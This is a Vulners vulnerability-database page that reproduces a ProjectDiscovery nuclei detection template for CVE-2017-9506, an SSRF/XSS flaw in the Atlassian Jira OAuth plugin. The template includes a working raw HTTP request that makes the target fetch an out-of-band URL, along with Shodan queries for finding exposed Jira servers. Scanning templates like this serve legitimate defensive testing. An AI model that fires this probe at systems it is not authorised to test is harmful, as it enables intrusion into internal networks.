Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 40 Views

Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery vulnerability from OAuth Plugin versions 1.3.0 to 1.9.12 and 2.0.0 to 2.0.4 allows unauthorized access and potential data theft

Related
Refs
Code
ReporterTitlePublishedViews
Family
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
30 Aug 201702:06
atlassian
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
21 Mar 201720:59
atlassian
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
30 Aug 201702:12
atlassian
Atlassian		The bundled Atlassian Activity Streams plugin had Improper Access control inside several rest inline action resource resource - CVE-2017-9506
21 Sep 201700:10
atlassian
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
30 Aug 201702:06
atlassian
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
21 Mar 201720:59
atlassian
Atlassian		The bundled Atlassian OAuth plugin allows arbitrary HTTP requests to be proxied - CVE-2017-9506
30 Aug 201702:12
atlassian
Atlassian		The bundled Atlassian Activity Streams plugin had Improper Access control inside several rest inline action resource resource - CVE-2017-9506
21 Sep 201700:10
atlassian
Tenable Nessus		Atlassian Bamboo < 6.0.0 OAuth plugin allows arbitrary HTTP requests to be proxied
28 Jun 201800:00
nessus
Tenable Nessus		Atlassian Bitbucket < 4.14.4 OAuth Plugin IconUriServlet Internal Network Resource Disclosure CSRF
28 Jun 201800:00
nessus
Rows per page
id: CVE-2017-9506

info:
  name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
  author: pdteam
  severity: medium
  description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.
  remediation: |
    Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.
  reference:
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9506
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-9506
    cwe-id: CWE-918
    epss-score: 0.36995
    epss-percentile: 0.98316
    cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: oauth
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2017,atlassian,jira,ssrf,oast,vkev,vuln

http:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100d38df16ad147275cac026a6476fc404f3153804bcc81c596f2b4802580d9ecdd022043c5ab6a6f2c246c02a53ec871583dbb8dff7e78681e59e98151b76a2a5f6625:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.36995
SSVC
cvecve2017atlassianjirassrfoauth
40